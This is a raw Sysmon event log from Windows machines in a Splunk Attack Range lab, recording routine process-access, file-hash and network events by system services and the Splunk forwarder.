08:07:46.662{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054671Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.662{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001054670Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.646{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054669Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.646{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054668Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.646{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054667Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.646{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054666Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.646{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054665Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.646{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054664Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.646{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054663Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.646{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054662Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.646{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054661Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.646{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054660Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.646{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054659Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.646{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001054658Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.094{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4063460C9AE4C5964BD2CEB522B1C290,SHA256=18571BFCA6FE09B749EF3FBDEC5347DD0799C9714A24BB5E72ED29C66979A46C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810395Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:45.353{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57463-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810394Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:46.204{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C61B63DB52222432B42E245B2AEAE4A9,SHA256=40EAB358DD395C385DE36B522BCAB75537E3CC4D747035C231A26F1C64CF470C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054684Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:47.864{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6E2690AC2424BD01369D6410C7A16AA6,SHA256=CCC21F3B371DCF0BC75B1ACF29798174CD941F570E451A31A94D5D14890155A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054683Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:47.527{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91526B53DDC3591D4F9D22DB108B315A,SHA256=A2F707849662725376148E6D84627320A373B5A0B5CD897D182F0FA0CC448B57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810396Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:47.251{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=374FFFB0A9BCCC301ECAC1BC7C01B6B7,SHA256=769671FECF8B07B182BD1627AC272832B972D7A9F4579C3EC1481A0084514554,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810397Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:48.251{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3C26ADDE368DD4935C396D083C4118D,SHA256=C089668B7E5BFF9D198EC2676943A19C6C917F52EACA2E222079AACB488F8A21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054685Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:48.532{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C303D979EDA8471F400FCFF0305515E,SHA256=73B8E495C2465F9FFEFB6B06545DCB71C20BCBAC466F004E78B3468A0350440E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810398Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:49.298{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC2D9D65EE52F5CD37C81959D93E75B6,SHA256=77983D65EB809DE9F19568930C34F27F322A8842BEE6EE6AC62588E45261F355,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054686Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:49.550{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E908B35B1CA8BB86EF6FC893C1E1F76,SHA256=A4B95C6E4BF3931D896DF911ABE957E147864501B8BA973D897EB77C8689092E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054704Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.773{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F856-60EB-F37D-00000000CF01}5752C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054703Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.773{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054702Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.773{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054701Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:50.773{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054700Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 